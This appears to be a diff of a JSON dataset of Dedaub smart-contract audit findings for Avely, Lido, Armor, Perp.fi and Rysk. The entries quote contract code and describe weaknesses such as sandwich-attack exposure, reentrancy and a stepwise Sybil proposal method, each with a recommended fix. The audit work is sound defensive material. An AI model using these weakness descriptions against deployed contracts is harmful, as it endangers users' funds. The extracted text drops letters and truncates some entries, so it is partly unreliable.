It is recommended that the eld be declared Bool, in order to improve code readability and simplify the snippets that read from it.", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: High" + "Avely", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "non-standard ERC20 Tokens can be stuck inside the Resolved VFRBuffer 5 The VFRBuffer does not use the safeERC20 library for the transfer of ERC20 tokens. This can cause non-standard tokens (for example USDT) to be unable to be transferred inside the Buffer and get stuck there. This issue would normally be ranked lower, but since USDT is actively used in past strategies, it seems likely to arise with upcoming instantiations of the VFR pool. Medium Severity Nr. Description", + "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", + "body": "assignment sequence can be simplied RESOLVED In the aZil.CalculateTotalWithdrawalBlock procedure, can be simplied: procedure CalculateTotalWithdrawalBlock(deleg_withdrawal: Pair ByStr20 Withdrawal) match deleg_withdrawal with | Pair delegator withdrawal => match withdrawal with | Withdrawal withdraw_token_amt withdraw_stake_amt => match withdrawal_unbonded_o with | Some (Withdrawal token stake) => updated_token = builtin add token withdraw_token_amt; updated_stake = builtin add stake withdraw_stake_amt; unbonded_withdrawal = Withdrawal updated_token updated_stake; withdrawal_unbonded[delegator] := unbonded_withdrawal | None => (* Dedaub: This branch can be simplified to withdrawal_unbonded[delegator] := withdrawal *) unbonded_withdrawal = Withdrawal withdraw_token_amt withdraw_stake_amt; withdrawal_unbonded[delegator] := unbonded_withdrawal end end end end The inner matchs None case can become: | None => withdrawal_unbonded[delegator] := withdrawal end", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: High" + "Avely", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "rewards might get stuck in CompoundLeverageStrategy Status Dismissed (Normal path: rebalance before migrate) CompoundLeverageStrategy does not offer a way to migrate COMP tokens that might have been left unclaimed by the strategy up to the point of migration. What is more, COMP is declared a reserved token by CompoundMakerStrategy making it impossible to sweep the strategys COMP balance even if a claim is made to Compound after the migration. The _beforeMigration hook should be extended to account for the claim and consequent transfer of COMP tokens to the new strategy as follows: function _beforeMigration(address _newStrategy) internal virtual override { require(IStrategy(_newStrategy).token() == address(cToken), \"wrong-receipt-token\"); minBorrowLimit = 0; // It will calculate amount to repay based on borrow limit and payback all _reinvest(); // Dedaub: Claim COMP and transfer to new strategy. _claimComp(); IERC20(COMP).safeTransfer(_newStrategy,IERC20(COMP).balanceOf(address(this))); }", + "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", + "body": "of multisig_wallet.RevokeSignature can be simplied DISMISSED In multisig_wallet, RevokeSignature can be simplied. 
The transition checks whether there are zero signatures through c_is_zero = builtin eq c zero; But for this line of code to execute exists signatures[transactionId][_sender]; must have already been true. Therefore it is guaranteed that there is at least one signature, and c_is_zero cannot be 0. Thus the following transition can be simplied: (* Revoke signature of existing transaction, if it has not yet been executed. *) transition RevokeSignature (transactionId : Uint32) sig <- exists signatures[transactionId][_sender]; match sig with | False => err = NotAlreadySigned; MakeError err | True => count <- signature_counts[transactionId]; match count with | None => err = IncorrectSignatureCount; MakeError err | Some c => c_is_zero = builtin eq c zero; match c_is_zero with | True => err = IncorrectSignatureCount; MakeError err | False => new_c = builtin sub c one; signature_counts[transactionId] := new_c; delete signatures[transactionId][_sender]; e = mk_signature_revoked_event transactionId; event e end end end end By replacing the Some c branch with the following: Some c => new_c = builtin sub c one; signature_counts[transactionId] := new_c; delete signatures[transactionId][_sender]; e = mk_signature_revoked_event transactionId; event e", + "labels": [ + "Dedaub", + "Avely", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", + "body": "of azil.DrainBuffer logic can be simplied RESOLVED Transition DrainBuffer of aZil also admits some simplication: a bind action can be factored out, since it occurs in both cases of a match, and another binding is redundant, both shown in comments below. transition DrainBuffer(buffer_addr: ByStr20) RequireAdmin; buffers_addrs <- buffers_addresses; is_buffer = is_buffer_addr buffers_addrs buffer_addr; match is_buffer with | True => FetchRemoteBufferExistsAtSSN buffer_addr; (* local_lastrewardcycle updated in FetchRemoteBufferExistsAtSSN *) lrc <- local_lastrewardcycle; RequireNotDrainedBuffer buffer_addr lrc; var_buffer_exists <- tmp_buffer_exists_at_ssn; is_exists = builtin eq var_buffer_exists uint32_one; match is_exists with | True => holder_addr <- holder_address; ClaimRewards buffer_addr; ClaimRewards holder_addr; RequestDelegatorSwap buffer_addr holder_addr; ConfirmDelegatorSwap buffer_addr holder_addr | False => holder_addr <- holder_address; (* Dedaub: This is also done in the True branch of the match *) ClaimRewards holder_addr end | False => e = BufferAddrUnknown; ThrowError e end; lrc <- local_lastrewardcycle; (* Dedaub: extraneous, it was already done above in the True case, and the False case is irrelevant *) buffer_drained_cycle[buffer_addr] := lrc; tmp_buffer_exists_at_ssn := uint32_zero end Buer/Holder have permissions for transitions they will never A5 execute DISMISSED As can be seen in the earlier transition graph, Buer is allowed to initiate aZil.CompleteWithdrawalSuccessCallBack but never will. Holder is allowed to initiate aZil.DelegateStakeSuccessCallBack but never will.", + "labels": [ + "Dedaub", + "Avely", + "Severity: Informational" + ] + }, + { + "title": "suggestions ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Delta Audit - Sep 22.pdf", + "body": " INFO In the RelayEncoder.sol contract the function encode_withdraw_unbonded() uses several arithmetic operations with numbers that can be expressed as powers of 2. 
Thus, the multiplications and the divisions can be replaced with bitwise operations for more eiciency and maintainability. Furthermore, in Encoding.sol::scaleCompactUint:45 the 0xFF can be removed since the uint8() casting will give the same result even without the AND operation.", + "labels": [ + "Dedaub", + "Lido on Kusama,Polkadot Delta", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Delta Audit - Sep 22.pdf", + "body": "for minor changes ACKNOWLEDGED The auditors appreciated the inclusion of tests for all major changes. It would be benecial to include tests also for smaller changes that seem to be missing (for instance we could not nd a test for the case totalXcKSMPoolShares == 0 and totalVirtualXcKSMAmount != 0). Although this check is minor, the fact that it was missing in the previous version makes it worthy of a test. A3 Compiler known issues INFO The code is compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, to be condent about the baseline guarantees 4 oered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe aect the correctness of the contracts", + "labels": [ + "Dedaub", + "Lido on Kusama,Polkadot Delta", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", + "body": "tokens conversion Status Resolved In the following code snippet taken from arShield::liqAmts amounts ethOwed and tokensOwed are supposed to represent equal value. ethOwed = covBases[_covId].getShieldOwed( address(this) ); if (ethOwed > 0) tokensOwed = oracle.getTokensOwed(ethOwed, address(pToken), uTokenLink); tokenFees = feesToLiq[_covId]; tokensOwed += tokenFees; require(tokensOwed > 0, \"No fees are owed.\"); uint256 ethFees = ethOwed > 0 ? ethOwed * tokenFees / tokensOwed : getEthValue(tokenFees); ethOwed += ethFees; However, code line tokensOwed += tokenFees; is misplaced resulting in an underpriced ethFees computation. We suggest that it be altered as follows: ethOwed = covBases[_covId].getShieldOwed( address(this) ); if (ethOwed > 0) tokensOwed = oracle.getTokensOwed(ethOwed, address(pToken), uTokenLink); tokenFees = feesToLiq[_covId]; require(tokensOwed + tokenFees > 0, \"No fees are owed.\"); 5 uint256 ethFees = ethOwed > 0 ? ethOwed * tokenFees / tokensOwed : getEthValue(tokenFees); ethOwed += ethFees; tokensOwed += tokenFees; for accuracy. H2 Duplicate subtraction of fees amount Resolved In arShield::payAmts the new ethValue is calculated as follows: // Ether value of all of the contract minus what we're liquidating. ethValue = (pToken.balanceOf( address(this) ) // Dedaub: _tokenFees amount is subtracted twice - _tokenFees - totalFeeAmts()) * _ethOwed / _tokensOwed totalFeeAmounts() also considers all liquidation fees, resulting in _tokenFees being subtracted twice. This can cause important harm to the protocol, as the total value of coverage purchased is underestimated. 6 Medium Severity ", + "labels": [ + "Dedaub", + "Armor arShield", + "Severity: High" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", + "body": "variable name We suggest that variable totalCost Status Resolved // Current cost per second for all Ether on contract. 
uint256 public totalCost; be renamed to totalCostPerSec for clarity.", "labels": [ "Dedaub", "Armor arShield", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", "body": "version of SafeMath library Resolved The SafeMath library included is written for an old compiler version (< 0.8.0), even though the pragma is set to solidity 0.8.4. However, compiler versions 0.8.* revert on overflow or underflow, so this library has no effect. We suggest that ArmorCore.sol not use this library and substitute SafeMath operations with normal ones, and that the SafeMath.sol contract be completely removed.", "labels": [ "Dedaub", "Armor arShield", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", "body": "comment Resolved In arShield.sol function confirmHack has a misleading @dev comment: /** * Dedaub: used by governor, not controller * @dev Used by controller to confirm that a hack happened, which then locks the contract in anticipation of claims. **/ function confirmHack( uint256 _payoutBlock, uint256 _payoutAmt ) external isLocked onlyGov A4 Extra protection of refunds in arShield Resolved Function CoverageBase::disburseClaim is called by governance and transfers an ETH amount to a selected _arShield, that is supposed to be used for claim refunds. /** * @dev Governance may disburse funds from a claim to the chosen shields. * @param _shield Address of the shield to disburse funds to. * @param _amount Amount of funds to disburse to the shield. **/ function disburseClaim( address payable _shield, uint256 _amount ) external onlyGov { require(shieldStats[_shield].lastUpdate > 0, \"Shield is not authorized to use this contract.\"); _shield.transfer(_amount); } We suggest that an extra requirement be added, checking that _shield is locked. In the opposite case, the ETH amount transferred to the arShield contract as refunds can be immediately transferred to the beneficiary. The arShield contract's locking/unlocking and disburseClaim() are all governance-only actions; however, this suggestion ensures security in case of incorrect ordering of the governance transactions.", "labels": [ "Dedaub", "Armor arShield", "Severity: Informational" ] }, { "title": "might misbehave if bufferedRedeems != fundRaisedBalance ", "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", "body": " RESOLVED The intended procedure of forced unbond requires setting bufferedRedeems == fundRaisedBalance via a call to setBufferedRedeems. As a consequence, LidoUnbond::_processEnabled expects these two amounts to be equal during forced unbond. function _processEnabled(int256 _stake) internal { ... // Dedaub: This code will break if bufferedRedeems is not exactly // equal to fundRaisedBalance if (isUnbondForced && isRedeemDisabled && bufferedRedeems == fundRaisedBalance) { targetStake = 0; } else { targetStake = getTotalPooledKSM() / ledgersLength; } } However, the contract does not guarantee that these amounts will be exactly equal.
For instance, setBufferedRedeems only contains an inequality check: function setBufferedRedeems( uint256 _bufferedRedeems ) external redeemDisabled auth(ROLE_BEACON_MANAGER) { // Dedaub: Equality not guaranteed require(_bufferedRedeems <= fundRaisedBalance, \"LIDO: VALUE_TOO_BIG\"); bufferedRedeems = _bufferedRedeems; } It is also hard to verify that no other function modifying these amounts can be called after calling setBufferedRedeems. If, for any reason, the amounts are not exactly equal during forced unbond, the else branch in _processEnabled will be executed, causing targetStake to be wrongly computed and likely leaving the contract in a problematic state. To make the contract more robust, we recommend properly handling the case when the two amounts are different, possibly by reverting, instead of executing the wrong branch. For instance: function _processEnabled(int256 _stake) internal { ... // Dedaub: Modified code if (isUnbondForced && isRedeemDisabled) { require(bufferedRedeems == fundRaisedBalance); targetStake = 0; } else { targetStake = getTotalPooledKSM() / ledgersLength; } } Another approach could be to actually set _bufferedRedeems = fundRaisedBalance within this function. L2 Set bufferedRedeems = fundRaisedBalance and isUnbondForced in a single transaction RESOLVED Forced unbond is initiated by setting bufferedRedeems = fundRaisedBalance and isUnbondForced = true, via separate calls to setIsUnbondForced and setBufferedRedeems. If, however, only one of the two changes is performed, the contract will likely misbehave. As a consequence, it would be safer to perform both updates in a single transaction. OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing them. 
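Regarding L2 above: a minimal sketch of initiating forced unbond atomically, assuming the modifiers and state variables quoted from LidoUnbond; the function name is hypothetical:

function enableForcedUnbond() external redeemDisabled auth(ROLE_BEACON_MANAGER) {
    isUnbondForced = true;
    // Equality between the two amounts now holds by construction,
    // matching what _processEnabled expects during forced unbond.
    bufferedRedeems = fundRaisedBalance;
}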
", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": " RESOLVED SurplusBeneficiary::setFeeDistributor sets the new fee distributor contract and approves it to be able to transfer an innite amount of USDC. However, the approval of the old fee distributor is not revoked, allowing it to transfer any amount of USDC even though that contract might have been deemed obsolete or even vulnerable. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "might get called with amount set to 0 RESOLVED SurplusBeneciary::dispatch computes the amount of USDC that should be transferred to the treasury and executes the transfer without checking rst that the transferred amount is not 0. function dispatch() external override nonReentrant { // .. uint256 tokenAmountToTreasury = FullMath.mulDiv(tokenAmount, _treasuryPercentage, 1e6); // Dedaub: tokenAmountToTreasury might be 0 due to _treasuryPercentage // being 0 or due to rounding. SafeERC20.safeTransfer(IERC20(token), _treasury, tokenAmountToTreasury); // .. } oldBalance and newBalance are equal when", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "can be declared immutable INFO Storage variable _token of the SurplusBeneciary contract could be declared immutable, which would reduce the gas required to access it, as it is only set in the contracts constructor.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "functions should ensure new value is not equal to old RESOLVED 0 Functions setFeeDistributor and setTreasury of the SurplusBeneciary contract could implement a check that ensures the new value, which is being set, is not equal to the old one.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "USDC approval given to the FeeDistributor contract RESOLVED When seing the FeeDistributor contract for the SurplusBeneciary, innite USDC approval is also given to it. An alternative approach would be to set the approval (in function SurplusBeneficiary::dispatch) to the amount transferred prior to every transfer happening to avoid the dangers that come with approving a contract for an innite amount. 
Of course, there is a tradeoff; the extra approve call happening in every call of dispatch would translate into higher gas costs, which could be considered bearable as the protocol is deployed on Optimism.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "debt threshold can be set to lower than the default INFO There is no check to ensure the whitelist debt threshold cannot be set to a value that would be less than the default debt threshold. This might be intentional, but the term whitelist could have users expect that their debt threshold can only increase from the default. A6 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaffected. CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts wields considerable power over the protocol, including changing the contracts holding the users' funds, killing contracts (FeeDistributor), using emergency unlock (vePERP), etc. In addition, the owner of the protocol has total control of several protocol parameters: - the treasury contract address - the percentage of funds going to the treasury - the fee distributor contract address - the insurance fund surplus threshold - the insurance fund surplus beneficiary contract - the whitelisted debt threshold", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "math operations Status Resolved In contract vArmor.sol functions vArmorToArmor() and armorToVArmor() perform numerical operations without checking for overflow. In vArmorToArmor() overflow of the multiplication is not checked: function vArmorToArmor(uint256 _varmor) public view returns(uint256) { if(totalSupply() == 0){ return 0; } return _varmor * armor.balanceOf(address(this)) / totalSupply(); } Similar for armorToVArmor(). These functions are called during deposit and withdraw for calculating token amounts to be transferred, so erroneous results will have a significant impact on the correctness of the protocol. M2 DoS by proposing proposals that need to be voted out quickly Open Any governance token holder can DoS their peers by proposing many unfavorable proposals, which need to be voted out. Voting proposals out will incur more gas fees as these are subject to a deadline (and may be voted down by multiple participants), whereas a proposer can also wait for the optimal time to spend gas. Low Severity ", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "and gov privileged users not checked for address zero Status Open In Timelock.sol the addresses of gov and admin are set during the construction of the contract. 
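A sketch of such checks in the Timelock constructor (parameter names are hypothetical; the contract targets Solidity ^0.6.6, where constructor visibility is still declared):

constructor(address admin_, address gov_) public {
    // Dedaub (sketch): reject the zero address for both privileged roles
    require(admin_ != address(0), \"Timelock: admin is the zero address\");
    require(gov_ != address(0), \"Timelock: gov is the zero address\");
    admin = admin_;
    gov = gov_;
}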
Requirements checking for non-zero addresses, along these lines, are suggested.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "introduce opportunities for reentrancy during swaps Open In vArmor.sol, governance through a simple proposal can add tokenHelpers that are executed whenever a token transfer takes place. Token transfers also take place during swaps or other activities like deposits or withdrawals. The opportunity for reentrancy may not be immediately visible, but if this were to be possible, consequences may include the draining of LP pool funds. L3 Proposer can propose multiple proposals (Sybil attack) Open A proposer can propose multiple proposals at the same time, defeating checks to disallow this: 1) Deposit enough $armor in the vArmor pool 2) Propose a proposal 3) Withdraw $armor from the vArmor pool 4) Transfer $armor to a different address 5) Repeat The protocol offers the function cancel(uint proposalId) public to mitigate this attack, which cancels a proposal if the proposer's votes have fallen below the required threshold. However, this requires some users or the multisig to constantly be in a state of readiness. Other/Advisory Issues This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing them. ", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "type declarations Status Open In contract ArmorGovernor.sol the parameters of several functions are declared as uint256, whereas most numerical variables are declared as uint. We suggest that a single style of declaration is used for clarity and consistency.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "code style regarding subtractions Resolved In contract ArmorGovernor.sol functions cancel() and propose() include the same subtraction operation (block.number - 1) twice, but with slightly different implementations. One is executed immediately, while the other uses a safety-checking function, sub256(). In propose(): require(varmor.getPriorVotes(msg.sender, sub256(block.number, 1)) > proposalThreshold(block.number - 1), Similar in cancel(). Underflow seems unlikely in this case; however, we suggest that all subtractions are performed in the same way for consistency.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "errors in error messages Partially resolved (error in acceptGov() remains) In contract Timelock.sol functions acceptGov() and setPendingGov() contain a typo in the error messages of a requirement. 
In acceptGov(): require(msg.sender == address(this), \"Timelock::setPendingAdmin: Call must come from Timelock.\"); Should become: require(msg.sender == address(this), \"Timelock::setPendingGov: Call must come from Timelock.\"); Similar for setPendingGov().", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "event emitted Resolved In contract Timelock.sol the function setPendingGov() emits a wrong event. emit NewPendingAdmin(pendingGov); Should become emit NewPendingGov(pendingGov);", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "error messages Resolved In contract Timelock.sol the functions which are admin- or gov-only refer only to admin when it comes to authorization-related error messages. For example, in function queueTransaction() require(msg.sender == admin || msg.sender == gov, \"Timelock::queueTransaction: Call must come from admin.\"); Similar for functions cancelTransaction(), executeTransaction(). We suggest that the error messages are extended to include gov as well.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "code reuse Info In contract vArmor.sol the Checkpoint struct is used to record both account votes (storage variable checkpoints) and the total token supply (storage variable checkpointsTotal) while the struct field is named votes, making the code slightly harder to follow. For example, in function _writeCheckpointTotal we inspect the following checkpointsTotal[nCheckpoints - 1].votes = newTotal; A7 Floating pragma Info Use of a floating pragma: The floating pragma pragma solidity ^0.6.6; is used in the Timelock contract, allowing it to be compiled with any version of the Solidity compiler that is greater or equal to v0.6.6 and lower than v0.7.0. Although the differences between these versions are small, floating pragmas should be avoided and the pragma should be fixed to the version that will be used for the contracts' deployment. The ArmorGovernance contract uses pragma solidity ^0.6.12; which can be altered to the identical and simpler pragma solidity 0.6.12;.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Informational" + ] + }, + { + "title": "is susceptible to front-running RESOLVED The OptionExchange contract's redeem() function calls _swapExactInputSingle() with minimum output set to 0, making it susceptible to a front-running/sandwich attack when collateral is being liquidated. It is recommended that a minimum representing an acceptable loss on the swap is used instead. // OptionExchange::redeem function redeem(address[] memory _series) external { _onlyManager(); uint256 adLength = _series.length; for (uint256 i; i < adLength; i++) { // ... Dedaub: Code omitted for brevity. if (otokenCollateralAsset == collateralAsset) { // ... Dedaub: Code omitted for brevity. } else { // Dedaub: Minimum output set to 0. Susceptible to sandwich attacks. 
uint256 redeemableCollateral = _swapExactInputSingle(redeemAmount, 0, otokenCollateralAsset); SafeTransferLib.safeTransfer( ERC20(collateralAsset),address(liquidityPool),redeemableCollateral ); emit RedemptionSent( redeemableCollateral, collateralAsset, address(liquidityPool) ); } } } H2 VolatilityFeed updates are susceptible to front-running DISMISSED The VolatilityFeed contract uses the SABR model to compute the implied volatility of an option series. This model uses a number of parameters which are regularly updated by a keeper through the updateSabrParameters() function. It is possible for an attacker to front-run this update, transact with the LiquidityPool at the old price and then transact back with the LiquidityPool at the new price (computed in advance) if the difference is profitable. The Rysk team has indicated that trading will be paused for a few blocks to allow for parameter updates to happen and to effectively prevent this situation. MEDIUM SEVERITY: ID Description M1 No staleness check on the volatility feed ", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": " ACKNOWLEDGED The function quoteOptionPrice of the BeyondPricer contract retrieves the implied volatility from the function VolatilityFeed::getImpliedVolatility(). However, the returned value is not accompanied by a timestamp that can be used by the quoteOptionPrice() function to determine whether the value is stale or not. Since the implied volatility returned is affected by a keeper, which is responsible for updating the parameters of the underlying SABR model, it is recommended that staleness checks are implemented in order to avoid providing wrong implied volatility values. LOW SEVERITY: ", + "labels": [ + "Dedaub", + "Rysk", + "Severity: High" + ] + }, + { + "title": "use of price feeds for the price of the underlying ", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": " DISMISSED The BeyondPricer contract gets the price of the underlying token via the function _getUnderlyingPrice(), which consults a Chainlink price feed for the price. // BeyondPricer::_getUnderlyingPrice function _getUnderlyingPrice(address underlying, address _strikeAsset) internal view returns (uint256) { return PriceFeed(protocol.priceFeed()). getNormalizedRate(underlying, _strikeAsset); } However, when trying to obtain the same price in the function _getCollateralRequirements(), the addressBook is used to get the price feed from an Oracle implementing the IOracle interface. // BeyondPricer::_getCollateralRequirements function getCollateralRequirements( Types.OptionSeries memory _optionSeries, uint256 _amount ) internal view returns (uint256) { IMarginCalculator marginCalc = IMarginCalculator(addressBook.getMarginCalculator()); return marginCalc.getNakedMarginRequired( _optionSeries.underlying, _optionSeries.strikeAsset, _optionSeries.collateral, _amount / SCALE_FROM, _optionSeries.strike / SCALE_FROM, // assumes in e18 IOracle(addressBook.getOracle()).getPrice(_optionSeries.underlying), _optionSeries.expiration, 18, // always have the value return in e18 _optionSeries.isPut ); } The same addressBook technique is used in the getCollateral() function of the OptionRegistry contract and in the checkVaultHealth() function of the OptionRegistry contract. It is recommended that this is refactored to use the Chainlink feed in order to avoid a situation where different prices for the underlying are obtained by different parts of the code. 
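A minimal sketch of the suggested refactoring, in which every call site reads the underlying price through a single helper backed by the Chainlink-based PriceFeed (illustrative only; names reuse the excerpts above):

// Dedaub (sketch): single source of truth for the underlying price
function _underlyingPrice(address underlying, address strikeAsset) internal view returns (uint256) {
    return PriceFeed(protocol.priceFeed()).getNormalizedRate(underlying, strikeAsset);
}

_getCollateralRequirements, OptionRegistry::getCollateral and checkVaultHealth would then pass the value returned by this helper instead of calling IOracle(addressBook.getOracle()).getPrice(...).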
The Rysk team intends to keep the price close to what the Opyn system would quote, thus using the Opyn Chainlink oracle is actually correct, as it represents the actual situation that would occur for these given quotes. L2 Multiple uses of div before mul in OptionExchange's _handleDHVBuyback() function RESOLVED In the OptionExchange contract's _handleDHVBuyback() function, a division is used before a multiplication operation at lines 925 and 932. It is recommended to use multiplication prior to division operations to avoid a possible loss of precision in the calculation. Alternatively, the mulDiv function of the PRBMath library could be used. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) ", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "reentrancy in OptionRegistry::redeem() ACKNOWLEDGED The OptionRegistry's redeem() function is not access controlled and calls the OpynInteractions library contract's redeem() function, which interacts with the GammaController and the option and collateral tokens. Dedaub's static analysis tools warned about a potential reentrancy risk. Our manual inspection identified no such immediate risk, but as the tokens supported are not strictly defined and a future version of the code could potentially make such an attack possible, it is advisable to add a reentrancy guard around OptionRegistry's redeem() function.", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "optimisation in OptionRegistry's open() function ACKNOWLEDGED The OptionRegistry::open() function performs the assignment vaultIds[series] = vaultId_ on line 271. But this can be moved into the if block starting at line 255, since vaultId_ only changes value if this if block is executed. // OptionRegistry::open function open( address _series, uint256 amount, uint256 collateralAmount ) external returns (bool, uint256) { _isLiquidityPool(); // make sure the options are ok to open Types.OptionSeries memory series = seriesInfo[_series]; // assumes strike in e8 if (series.expiration <= block.timestamp) { revert AlreadyExpired(); } // ... Dedaub: Code omitted for brevity. if (vaultId_ == 0) { vaultId_ = (controller.getAccountVaultCounter(address(this))) + 1; vaultCount++; } // ... Dedaub: Code omitted for brevity. // Dedaub: Below assignment can be moved inside the above block. vaultIds[_series] = vaultId_; // returns in collateral decimals return (true, collateralAmount); }", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "comment in OptionExchange's _swapExactInputSingle() function RESOLVED The OptionExchange's _swapExactInputSingle() function definition is annotated with several misleading comments. 
For instance, it mentions that _amountIn has to be in WETH when it can support any collateral token. It also mentions that _assetIn is the stablecoin that is bought, when it is in fact the collateral that is swapped. The description of the function, which reads \"function to sell exact amount of wETH to decrease delta\", is incorrect. // OptionExchange::_swapExactInputSingle /** @notice function to sell exact amount of wETH to decrease delta * @param _amountIn the exact amount of wETH to sell * @param _amountOutMinimum the min amount of stablecoin willing to receive. Slippage limit. * @param _assetIn the stablecoin to buy * @return the amount of usdc received */ function _swapExactInputSingle( uint256 _amountIn, uint256 _amountOutMinimum, address _assetIn) internal returns (uint256) { // ... Dedaub: Code omitted for brevity. }", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", + "body": "comment in BeyondPricer's _getSlippageMultiplier() function RESOLVED The division of the _amount by 2, mentioned in the code comment, does not appear in the code. It appears that this comment corresponds to a previous version of the codebase and it should be removed. //BeyondPricer::_getSlippageMultiplier function _getSlippageMultiplier( uint256 _amount, int256 _optionDelta, int256 _netDhvExposure, bool _isSell ) internal view returns (uint256 slippageMultiplier) { // divide _amount by 2 to obtain the average exposure throughout the tx. // Dedaub: The above comment is not relevant any more. // ... Dedaub: Code omitted for brevity. }", + "labels": [ + "Dedaub", + "Rysk", + "Severity: Informational" + ] + }, + { + 